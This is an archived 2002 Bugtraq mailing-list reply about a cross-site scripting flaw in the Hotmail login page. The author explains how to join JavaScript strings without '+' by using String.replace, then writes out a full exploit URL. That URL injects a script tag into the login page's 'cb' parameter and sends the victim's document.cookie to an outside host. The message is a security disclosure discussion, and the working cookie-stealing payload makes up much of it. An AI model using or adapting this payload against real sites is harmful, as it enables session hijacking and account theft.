[27341] in bugtraq
RE: XSS bug in hotmail login page
daemon@ATHENA.MIT.EDU (Thor Larholm)
Tue Oct 8 13:06:41 2002
Message-ID: <52D05AEFB0D95C4BAD179A054A54CDEB03470DF3@mailsrv1.jubii.dk>
From: Thor Larholm <Thor@jubii.dk>
To: "'Russell Harding'" <hardingr@cunap.com>, Thor Larholm <Thor@jubii.dk>
Date: Tue, 8 Oct 2002 11:00:56 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
> From: Russell Harding [mailto:hardingr@cunap.com]
> Is there another way to exploit this which I am not
> seeing? Or does MSN actually have their act together
> (in this particular case...)?
>
> -Russell
>
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?
Sure there is, the first that springs to mind is to use the replace method
which all strings have:
var myString = "hi $".replace('$','monkeyboy');
alert( myString ); // alerts "hi monkeyboy"
The first argument can be both a string or a regular expression.
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><sc
ript>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl
ace('$',document.cookie));</script>&ct=1033054530&_setlang=",,-1,0,,,,
Regards
Thor Larholm
Jubii A/S - Internet Programmer
